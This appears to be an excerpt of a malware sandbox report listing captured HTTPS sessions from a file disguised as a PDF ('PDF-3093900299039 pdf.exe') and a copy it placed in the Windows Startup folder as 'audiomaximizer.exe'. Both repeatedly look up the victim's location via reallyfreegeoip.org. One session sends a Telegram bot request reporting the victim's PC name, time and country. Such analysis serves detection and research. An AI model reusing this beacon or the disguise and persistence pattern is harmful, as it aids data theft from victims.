                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.449743104.21.32.14437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:16 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:16 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081285
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKJI9P%2BmdJXiuq7%2FzHd9plWebebhaNql4g301mBYUBGqQrx%2BJiM4MKmNTSVZGO8%2FEDx7rtRRxT0tJW5etPltZlPzdanipArjRY0E8IelJXy8zkQ1%2BVuEpnF0B8xEpazymSg%2BQu3B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed6d3c4c72b9-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1731&rtt_var=672&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1600000&cwnd=217&unsent_bytes=0&cid=c7e95ebbf928a415&ts=161&x=0"
                                                                                                                                                                              2025-01-13 11:08:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.449745104.21.32.14437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:18 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:18 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:18 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081287
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ru0rbYUMa%2B3krRZH5sDJVBw0SV3K3rfRxdcj63HevBk2zGh66L4pZ9jAyRT05kr12JiZSO%2FbgZRtZL5cm0LKK2W4t4Js8uzb3lZGB%2BsVNa8TSXaAEJgOyVQ%2F5H37aNR06J4ORmX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed773af441a6-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1548&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1809169&cwnd=241&unsent_bytes=0&cid=9882c92a614ad262&ts=143&x=0"
                                                                                                                                                                              2025-01-13 11:08:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.449747104.21.32.14437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:19 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:20 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:19 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081289
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2F8G6ZJOme9K3bFTQ0KARhvRFPleZUML6HRoYehqJzqoE%2FhzEu8uXqtUSUWHDgGbZDzivQ0tol9QC6Ffd0s7o%2BwxE11%2FJhtV4UyVVp2eMYYcRDcnw%2FVtx9m6si%2FgWdrmLOwuCu%2FU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed80bdedc327-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1605&rtt_var=617&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1819314&cwnd=189&unsent_bytes=0&cid=7372a27a6a4951fb&ts=166&x=0"
                                                                                                                                                                              2025-01-13 11:08:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.449751104.21.32.14437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:21 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:21 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081290
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vREf5L8R1bfOcDbtd%2BidaQAmFafzTHBNy5KbFVSKtbrJjGoGbcgb77hT45lvqasgN2hG3KRLLLJWP%2BD5zDlW7Dk1s8K7oBsKAlu%2BiTQawCLfGj1Y%2BQp8b%2FyWq9zphHHW%2FJNNakDi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed89adfe8cda-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1759&rtt_var=669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1624026&cwnd=244&unsent_bytes=0&cid=69de9f4147bac988&ts=144&x=0"
                                                                                                                                                                              2025-01-13 11:08:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.449752104.21.32.14437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:21 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:21 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081290
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UvbEsQ%2FX0PntJq1VTg2lLugMrc91jDg%2F4Weum5ZKQY2XSzXvgPWodV0wqbv%2F9d%2B7oFz185FRoCu8hHcV9kH75uMJBvWwR1%2FCE2IxDFtziHFFs0QunXU7OTP%2FQw90Ov9mOjBhP8I9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed8be95d72b9-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1712&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1634938&cwnd=217&unsent_bytes=0&cid=01982a27461d79f5&ts=158&x=0"
                                                                                                                                                                              2025-01-13 11:08:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.449755104.21.32.14437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:22 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              2025-01-13 11:08:22 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:22 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081291
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yvpvQCZpNS%2FwSFTZTbg3HeO8KVa1Pn8KS2F0aYJK2eYai%2BeZnS8nyaDks%2BVOYUi6L3zjdrrMTmfhvirjFm1DciMibWE8KRzX2HfKhWIHhEaPRzCnZbliTB6%2FbP5NqeF9%2BDH0H%2BiM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed927de572b9-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1842&rtt_var=704&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1540084&cwnd=217&unsent_bytes=0&cid=fdbd599a8312e4ae&ts=134&x=0"
                                                                                                                                                                              2025-01-13 11:08:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              10192.168.2.449756104.21.32.14437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:22 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              2025-01-13 11:08:22 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:22 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081291
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rABAjmzrizh3RMauUTaGK8pO3w01M95Do%2BpxmQNrJ%2FRPtGP5n3G5dGE%2FQtqqw8%2BkdsBoJvwUZeH21F%2FCfwHkcmZTl2xKaZ0YQ71giLF7KFCfAw9pxIDSN%2FXDPyoI9SWQyrxlfKEG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed92ae2b8cda-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1762&rtt_var=674&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1607044&cwnd=244&unsent_bytes=0&cid=748dc914123c073d&ts=138&x=0"
                                                                                                                                                                              2025-01-13 11:08:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              11192.168.2.449760149.154.167.2204437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:23 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:23 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:23 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                              2025-01-13 11:08:23 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              12192.168.2.449762104.21.32.14437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:24 UTC862INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:24 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081293
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GAacKOf5mq5WV8Ame1drhXpjjmYxBAOfOy0fPCHny%2FrOJa1k%2FqLi%2F6mFtQR4c44tZEaAKzJ2xaj%2BbvuruXADBRkvN6z6JNEv1C7J2c%2Fgez5s1j%2BKpU%2F3O4kiThsp2yzTb9MGUs7n"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed9bdb904344-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1693&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1655328&cwnd=47&unsent_bytes=0&cid=461da51b73a58723&ts=150&x=0"
                                                                                                                                                                              2025-01-13 11:08:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
